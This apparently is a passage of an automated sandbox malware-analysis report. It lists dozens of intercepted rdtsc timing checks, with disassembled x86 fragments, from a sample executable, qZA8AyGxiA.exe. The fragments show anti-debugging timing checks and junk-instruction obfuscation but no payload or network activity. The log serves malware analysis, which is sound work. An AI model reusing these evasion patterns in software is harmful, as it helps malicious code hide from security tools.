Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F25A4 second address: 10F25B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FC7292A9B06h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c push eax 0x0000000d jl 00007FC7292A9B06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112659B second address: 112659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112C994 second address: 112C999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112C999 second address: 112C99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112D02E second address: 112D048 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7292A9B0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112D048 second address: 112D05A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112D05A second address: 112D07A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC7292A9B08h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112D149 second address: 112D14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 112F973 second address: 112F99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC7292A9B1Bh 0x0000000c jng 00007FC7292A9B06h 0x00000012 jmp 00007FC7292A9B0Fh 0x00000017 push edi 0x00000018 jnp 00007FC7292A9B0Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135B51 second address: 1135B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135B63 second address: 1135B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11350EB second address: 113510F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC728ECBE06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC728ECBE14h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113510F second address: 113513E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7292A9B15h 0x00000008 jmp 00007FC7292A9B0Ch 0x0000000d jl 00007FC7292A9B06h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113513E second address: 1135144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135144 second address: 1135148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135421 second address: 1135425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11356F5 second address: 1135710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135710 second address: 1135714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135833 second address: 1135848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 jl 00007FC7292A9B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135848 second address: 1135865 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC728ECBE14h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1135865 second address: 113586B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113586B second address: 1135871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11361C8 second address: 11361CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11361CC second address: 11361E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC728ECBE10h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11367E2 second address: 11367E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11367E6 second address: 1136805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1136805 second address: 113681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7292A9B06h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 ja 00007FC7292A9B06h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1136AC9 second address: 1136ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1136ACD second address: 1136AD7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1136F57 second address: 1136F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113700D second address: 1137030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1137030 second address: 1137035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113722F second address: 1137234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11374A8 second address: 11374AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1137511 second address: 1137518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1137518 second address: 113755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FC728ECBE08h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sbb di, D9ECh 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FC728ECBE0Dh 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113755C second address: 1137580 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7292A9B15h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC7292A9B06h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1137AB8 second address: 1137ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1137ABE second address: 1137AC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11383DE second address: 1138423 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC728ECBE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC728ECBE11h 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007FC728ECBE12h 0x00000016 xor si, 7F8Fh 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f mov edi, eax 0x00000021 push eax 0x00000022 jc 00007FC728ECBE10h 0x00000028 push eax 0x00000029 push edx 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1139538 second address: 113953D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113953D second address: 11395B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC728ECBE08h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jng 00007FC728ECBE08h 0x0000002e mov edi, ebx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FC728ECBE08h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c xor edi, dword ptr [ebp+122D2B1Bh] 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1139F43 second address: 1139F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1139F52 second address: 1139FA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FC728ECBE08h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D186Dh], esi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov eax, dword ptr [ebp+122D2ED3h] 0x00000032 mov esi, dword ptr [ebp+122D2BC3h] 0x00000038 popad 0x00000039 push 00000000h 0x0000003b jmp 00007FC728ECBE11h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push esi 0x00000044 pushad 0x00000045 popad 0x00000046 pop esi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113A969 second address: 113A973 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113A973 second address: 113AA18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jc 00007FC728ECBE08h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FC728ECBE11h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FC728ECBE08h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov si, CFE0h 0x00000038 push 00000000h 0x0000003a and esi, 086B16D0h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007FC728ECBE08h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c movsx esi, cx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push edx 0x00000063 jmp 00007FC728ECBE19h 0x00000068 pop edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113AA18 second address: 113AA1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113AA1E second address: 113AA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113AA22 second address: 113AA26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113EF52 second address: 113EF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113EF58 second address: 113EF6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11415AA second address: 11415AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113FE65 second address: 113FEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC7292A9B0Eh 0x0000001a jmp 00007FC7292A9B18h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10EBABD second address: 10EBAC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10EBAC2 second address: 10EBADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1148B2E second address: 1148B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1145613 second address: 114561D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114561D second address: 1145621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149BF2 second address: 1149BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149BF8 second address: 1149C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149C1A second address: 1149C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 ja 00007FC7292A9B06h 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f push edi 0x00000010 mov ebx, dword ptr [ebp+122D2F39h] 0x00000016 pop ebx 0x00000017 push 00000000h 0x00000019 mov ebx, 39094727h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC7292A9B08h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a sub dword ptr [ebp+12469B0Dh], edi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 ja 00007FC7292A9B06h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149C6F second address: 1149C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149D62 second address: 1149D6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149D6C second address: 1149D76 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC728ECBE0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149E52 second address: 1149E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114BA06 second address: 114BA18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FC728ECBE06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114BA18 second address: 114BA22 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ACF8 second address: 114ACFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ACFF second address: 114AD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114BB76 second address: 114BB89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114CBB8 second address: 114CBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114CBC0 second address: 114CC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC728ECBE08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov ebx, esi 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D37CAh], eax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 cld 0x0000003a mov eax, dword ptr [ebp+122D0075h] 0x00000040 mov bh, 93h 0x00000042 push FFFFFFFFh 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007FC728ECBE08h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov di, 2DEBh 0x00000062 movzx ebx, ax 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007FC728ECBE08h 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114CC3F second address: 114CC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC7292A9B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1153C32 second address: 1153C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1153C38 second address: 1153C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1150E89 second address: 1150E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1150E8D second address: 1150E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1155D1D second address: 1155D22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
